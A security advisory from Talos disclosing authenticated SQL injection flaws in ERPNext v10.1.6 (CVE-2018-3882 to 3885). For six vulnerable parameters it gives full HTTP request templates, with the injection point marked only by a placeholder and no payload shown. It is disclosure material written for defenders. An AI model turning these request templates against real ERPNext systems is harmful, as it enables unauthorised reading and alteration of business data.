Talos Vulnerability Report

TALOS-2018-0560

ERPNext SQL Injection Vulnerabilities

September 5, 2018
CVE Number

CVE-2018-3882, CVE-2018-3883, CVE-2018-3884, CVE-2018-3885

Summary

Exploitable SQL injection vulnerabilities exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

Tested Versions

ERPNext v10.1.6 (master)

Product URLs

https://erpnext.com/

CVSSv3 Score

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CWE

CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

Details

The following parameters are vulnerable to SQL injection attacks:

CVE-2018-3882 - searchfield parameter

The searchfield parameter can be used to perform an SQL injection attack as shown below:

GET /?txt=a&searchfield=name<SQLINJECTION>&query=erpnext.controllers.queries.employee_query&doctype=Employee&cmd=frappe.desk.search.search_widget&_=1522110063950 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close

CVE-2018-3883 - employee parameter

The employee parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 194
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close

	employee=EMP%2f0001<SQLINJECTION>&date=2018-03-07&leave_type=Leave+Without+Pay&consider_all_leaves_in_the_allocation_period=true&cmd=erpnext.hr.doctype.leave_application.leave_application.get_leave_balance_on

CVE-2018-3883 - sort_order parameter

The sort_order parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

	item_code=asdasd&start=0&sort_by=projected_qty&sort_order=asc<SQLINJECTION>&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3884 - sort_by parameter

The sort_by parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

	item_code=asdasd&start=0&sort_by=projected_qty<SQLINJECTION>&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3884 - start parameter

The start parameter can be used to perform an SQL injection attack as shown below:

POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

	item_code=asdasd&start=0<SQLINJECTION>&sort_by=projected_qty&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data

CVE-2018-3885 - order_by parameter

The order_by parameter can be used to perform an SQL injection attack as shown below:

GET /?start=0&page_length=20&doctype=Customer&fields=[%22%60tabCustomer%60.%60name%60%22%2c%22%60tabCustomer%60.%60owner%60%22%2c%22%60tabCustomer%60.%60docstatus%60%22%2c%22%60tabCustomer%60.%60_user_tags%60%22%2c%22%60tabCustomer%60.%60_comments%60%22%2c%22%60tabCustomer%60.%60modified%60%22%2c%22%60tabCustomer%60.%60modified_by%60%22%2c%22%60tabCustomer%60.%60_assign%60%22%2c%22%60tabCustomer%60.%60_liked_by%60%22%2c%22%60tabCustomer%60.%60_seen%60%22%2c%22%60tabCustomer%60.%60customer_name%60%22%2c%22%60tabCustomer%60.%60image%60%22%2c%22%60tabCustomer%60.%60disabled%60%22%2c%22%60tabCustomer%60.%60customer_group%60%22%2c%22%60tabCustomer%60.%60territory%60%22%2c%22%60tabCustomer%60.%60customer_type%60%22]&filters=%5B%5D&order_by=<SQLINJECTION>&with_comment_count=true&user_settings=%7B%22updated_on%22%3A%22Tue+Mar+27+2018+01%3A08%3A06+GMT%2B0100%22%2C%22List%22%3A%7B%22filters%22%3A%5B%5D%2C%22order_by%22%3A%22%60tabCustomer%60.%60modified%60+desc%22%7D%2C%22last_view%22%3A%22List%22%7D&cmd=frappe.desk.reportview.get&_=1522108874124 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close

Timeline

2018-04-12 - Vendor Disclosure
2018-09-05 - Public Release

Credit

Discovered by Yuri Kramarz of Security Advisory EMEAR